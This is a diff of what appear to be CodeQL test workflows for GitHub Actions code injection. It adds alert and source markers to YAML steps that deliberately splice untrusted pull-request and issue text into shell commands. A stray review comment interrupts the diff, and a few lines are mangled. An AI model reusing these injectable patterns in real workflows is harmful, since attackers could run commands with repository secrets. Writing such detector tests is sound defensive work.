--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml @@ -17,7 +17,7 @@ jobs: steps: - name: Echo trigger run: | - echo "head branch: ${{ github.event.workflow_run.head_branch }}" + echo "head branch: ${{ github.event.workflow_run.head_branch }}" # $ Alert[actions/code-injection/critical] cat << EOF - ${{ toJSON(github.event) }} + ${{ toJSON(github.event) }} # $ Alert[actions/code-injection/critical] EOF diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml index 5422ac4e987..1eb2797e31b 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml @@ -17,5 +17,5 @@ jobs: repo-token: ${{ env.GH_TOKEN }} permission-level: read - - run: echo "${{ steps.command.outputs.command-arguments }}" + - run: echo "${{ steps.command.outputs.command-arguments }}" # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index 5aeb9aac7c5..6d29df90955 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -17,7 +17,7 @@ jobs: - id: step0 uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['pull_request']['body'] }} + source: ${{ github.event['pull_request']['body'] }} # $ Source[actions/code-injection/critical] find: 'foo' replace: '' - id: step1 @@ -49,4 +49,4 @@ jobs: needs: job1 steps: - - run: echo ${{needs.job1.outputs['job_output']}} + - run: echo ${{needs.job1.outputs['job_output']}} # $ Alert[actions/code-injection/critical] 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml index d149df2bd7c..b58a9cb0aa2 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml @@ -20,10 +20,10 @@ jobs: - name: Extract Jira Key env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] run: echo ISSUE_KEY=$(echo "$TITLE") >> $GITHUB_ENV - name: Sink - run: echo ${{ env.ISSUE_KEY }} + run: echo ${{ env.ISSUE_KEY }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml index 2e734076cb7..9cbfa20a6a2 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml @@ -54,7 +54,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -144,7 +144,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH 
@@ -237,7 +237,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -330,7 +330,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -420,7 +420,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -515,7 +515,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml index dc101c76944..151ae685df8 100644 
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml @@ -27,7 +27,7 @@ jobs: name: event_file path: artifacts/event_file - - name: Try to read PR number + - name: Try to read PR number # $ Source[actions/code-injection/critical] id: set-ref run: | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) @@ -51,6 +51,6 @@ jobs: actions: read statuses: write steps: - - run: echo ${{ needs.get-artifacts.outputs.pr_num }} - - run: echo ${{ needs.get-artifacts.outputs.ref }} + - run: echo ${{ needs.get-artifacts.outputs.pr_num }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ needs.get-artifacts.outputs.ref }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml index f81bef89568..e141ea55a11 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml @@ -7,7 +7,7 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.pull_request.title || "foo" }}" + - run: echo "${{ github.event.pull_request.title || "foo" }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml index 1e5c7eec177..876141d0e17 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml 
@@ -7,8 +7,8 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.changes.body.from }}" - - run: echo "${{ github.event.changes.title.from }}" - - run: echo "${{ github.event.changes.head.ref.from }}" - - run: echo "${{ toJson(github.event.changes) }}" + - run: echo "${{ github.event.changes.body.from }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ github.event.changes.title.from }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ github.event.changes.head.ref.from }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ toJson(github.event.changes) }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml index 6d925a82d37..df3dd6e8a11 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml @@ -12,8 +12,8 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.changed-files.outputs.files }}" + echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.changed-files.outputs.files }}" # $ Alert[actions/code-injection/critical] test2: runs-on: ubuntu-latest steps: 
@@ -23,8 +23,8 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "files=${FILES}" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.changed-files.outputs.files }}" + echo "files=${FILES}" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.changed-files.outputs.files }}" # $ Alert[actions/code-injection/critical] test3: runs-on: ubuntu-latest steps: @@ -33,8 +33,8 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" - - run: echo "${{ env.CHANGED-FILES }}" + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.CHANGED-FILES }}" # $ Alert[actions/code-injection/critical] test4: runs-on: ubuntu-latest steps: @@ -44,8 +44,8 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" - - run: echo "${{ env.CHANGED-FILES }}" + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.CHANGED-FILES }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml index a39967760e8..bc06e8a525d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml 
@@ -9,30 +9,30 @@ jobs: steps: - id: title run: | - echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title }}" + echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title }}" # $ Alert[actions/code-injection/critical] test2: runs-on: ubuntu-latest steps: - id: title run: | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) - echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title }}" + echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title }}" # $ Alert[actions/code-injection/critical] test3: runs-on: ubuntu-latest steps: - id: title run: | - echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" - - run: echo "${{ env.TITLE }}" + echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.TITLE }}" # $ Alert[actions/code-injection/critical] test4: runs-on: ubuntu-latest steps: - id: title run: | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) - echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" - - run: echo "${{ env.TITLE }}" + echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] + - run: echo "${{ env.TITLE }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml index 0b3002506a1..bf5346b330d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml 
@@ -30,7 +30,7 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: pr-id - - name: get PR id + - name: get PR id # $ Source[actions/code-injection/critical] id: pr run: echo "value=$(> $GITHUB_OUTPUT @@ -42,7 +42,7 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: pr-ref - - name: get PR ref + - name: get PR ref # $ Source[actions/code-injection/critical] id: ref run: echo "value=$(> $GITHUB_OUTPUT @@ -122,7 +122,7 @@ jobs: - name: Get commit message id: commit-message - run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT + run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT # $ Source[actions/code-injection/critical] # ================= Deploy Demo ================= - name: 📦 Build demo @@ -227,5 +227,5 @@ jobs: "📑 Examples": "${{ needs.build-demo.outputs.preview-url }}/", "📚 Storybook": "${{ needs.build-storybook.outputs.preview-url }}/" } - } + } # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml index 559c69c4710..712c6fb8100 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml @@ -19,10 +19,10 @@ jobs: route: GET /repos/${{ github.repository }}/pulls/${{ github.event.issue.number }} env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Set PR source branch as env variable + - name: Set PR source branch as env variable # $ Source[actions/code-injection/critical] if: github.event_name == 'issue_comment' run: | - PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') + PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') # $ Alert[actions/code-injection/critical] echo "BRANCH=$PR_SOURCE_BRANCH" >> $GITHUB_ENV setup2: runs-on: ubuntu-latest 
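Review bot: The `@@ -227` hunk of test16.yml anchors `# $ Alert[actions/code-injection/critical]` on a bare `}` closing a multi-line value, so a reader cannot tell from the fixture which `${{ … }}` expression the alert belongs to; the `needs.build-demo.outputs.preview-url` and `needs.build-storybook.outputs.preview-url` interpolations just above are the only candidates visible here. Elsewhere in this patch the tag sits on the line holding the tainted expression, for example test17.yml's `PR_SOURCE_BRANCH=…` line. Presumably the alert location covers the whole block and the expectation is matched against its last line; a comment where that block begins (outside this hunk), stating that the expectation is placed on the block's closing line for that reason, would make it explicit. The block this `}` closes starts outside the hunk.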
@@ -36,13 +36,13 @@ jobs: pull_number: ${{ github.event.issue.number }} env: GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} - - name: Set environment variables + - name: Set environment variables # $ Source[actions/code-injection/critical] run: | MERGE_STATUS=${{ fromJson(steps.get-pr-details.outputs.data).mergeable }} if $MERGE_STATUS; then echo "COMMENT=\[Fast Forward CI\] ${{ env.HEAD_REF }} cannot be merged into ${{ env.BASE_REF }} at the moment." >> $GITHUB_ENV; fi echo "MERGE_STATUS=$MERGE_STATUS" >> $GITHUB_ENV echo "BASE_REF=${{ fromJson(steps.get-pr-details.outputs.data).base.ref }}" >> $GITHUB_ENV - echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV + echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV # $ Alert[actions/code-injection/critical] setup3: runs-on: ubuntu-latest steps: @@ -52,8 +52,8 @@ jobs: route: GET /repos/${{ github.repository_owner }}/${{ github.repository }}/issues?state=open env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN}} - - run: | - echo '${{ steps.issues.outputs.data }}' > issues.json + - run: | # $ Source[actions/code-injection/critical] + echo '${{ steps.issues.outputs.data }}' > issues.json # $ Alert[actions/code-injection/critical] setup4: runs-on: ubuntu-latest steps: @@ -65,10 +65,10 @@ jobs: repo: bar pull_number: ${{ github.event.issue.number }} - - run: >- + - run: >- # $ Source[actions/code-injection/critical] echo "Pull request title is \"${{ fromJson(steps.get-pull-request.outputs.data).title }}\" but expected - \"Updated test pull request\"" && exit 1 + \"Updated test pull request\"" && exit 1 # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml index 552ad866b5a..ba51066def8 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml @@ -13,9 +13,9 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.GITHUBACTIONS_TOKEN }} - - name: Write issues to file + - name: Write issues to file # $ Source[actions/code-injection/critical] run: | - echo '${{ steps.issues.outputs.data }}' > issues.json + echo '${{ steps.issues.outputs.data }}' > issues.json # $ Alert[actions/code-injection/critical] - name: Setup Node.js uses: actions/setup-node@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml index 2773c1044db..9ee26e0d626 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml 
@@ -10,102 +10,102 @@ jobs: - id: head_ref run: | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName') - echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.head_ref.outputs.head_ref}}" + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.head_ref.outputs.head_ref}}" # $ Alert[actions/code-injection/critical] - id: title run: | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title) - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh pr view $PR_NUMBER --json body --jq .body) - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')" - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] - id: files run: | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')" - echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.files.outputs.files}}" + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.files.outputs.files}}" # $ Alert[actions/code-injection/critical] - id: 
author run: | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') - echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.author.outputs.author}}" + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.author.outputs.author}}" # $ Alert[actions/code-injection/critical] pulls2: runs-on: ubuntu-latest steps: - id: head_ref run: | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1) - echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.head_ref.outputs.head_ref}}" + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.head_ref.outputs.head_ref}}" # $ Alert[actions/code-injection/critical] - id: title run: | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title") - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body") - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] - id: files run: | CHANGED_FILES=$(gh api 
/repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename') - echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.files.outputs.files}}" + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.files.outputs.files}}" # $ Alert[actions/code-injection/critical] - id: author run: | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login") - echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.author.outputs.author}}" + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.author.outputs.author}}" # $ Alert[actions/code-injection/critical] issues1: runs-on: ubuntu-latest steps: - id: title run: | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body') - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] issues2: runs-on: ubuntu-latest steps: - id: title run: | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq 
".title") - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body") - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] pulls3: runs-on: ubuntu-latest steps: 
@@ -113,20 +113,20 @@ jobs: run: | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName") TITLE=$(echo $DETAILS | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title1.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title1.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: title2 run: | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName") TITLE=$(echo $TITLE | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title2.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title2.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: title3 run: | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author) TITLE=$(echo $TITLE | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title3.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title3.outputs.title}}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml index 03ee63fe9cf..5bca1705b9d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml @@ -22,9 +22,9 @@ jobs: filters: | locale: - '*.xml' - - name: Changed files 1 + - name: Changed files 1 # $ Source[actions/code-injection/critical] run: | - echo changed: ${{ steps.changed.outputs.locale_files }} + echo changed: ${{ steps.changed.outputs.locale_files }} # $ Alert[actions/code-injection/critical] echo changed: ${{ steps.changed.outputs.changes }} - name: Check for relevant changes uses: dorny/paths-filter@v3 
@@ -34,9 +34,9 @@ jobs: filters: | locale: - '*.xml' - - name: Changed files 2 + - name: Changed files 2 # $ Source[actions/code-injection/critical] run: | - echo changed:${{ steps.changed2.outputs.locale_files }} + echo changed:${{ steps.changed2.outputs.locale_files }} # $ Alert[actions/code-injection/critical] echo changed: ${{ steps.changed2.outputs.changes }} - name: Check for relevant changes uses: dorny/paths-filter@v3 diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml index 27d8a666fc9..9f906d507cf 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml @@ -12,7 +12,7 @@ jobs: echo " " echo "github.ref = ${{ github.ref }}" echo "github.sha = ${{ github.sha }}" - echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" + echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" # $ Alert[actions/code-injection/medium] echo "github.event.pull_request.head.sha = ${{ github.event.pull_request.head.sha }}" echo "github.event.pull_request.base.ref = ${{ github.event.pull_request.base.ref }}" echo "github.event.pull_request.base.sha = ${{ github.event.pull_request.base.sha }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml index 03ecc20de86..292891b8ccb 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml 
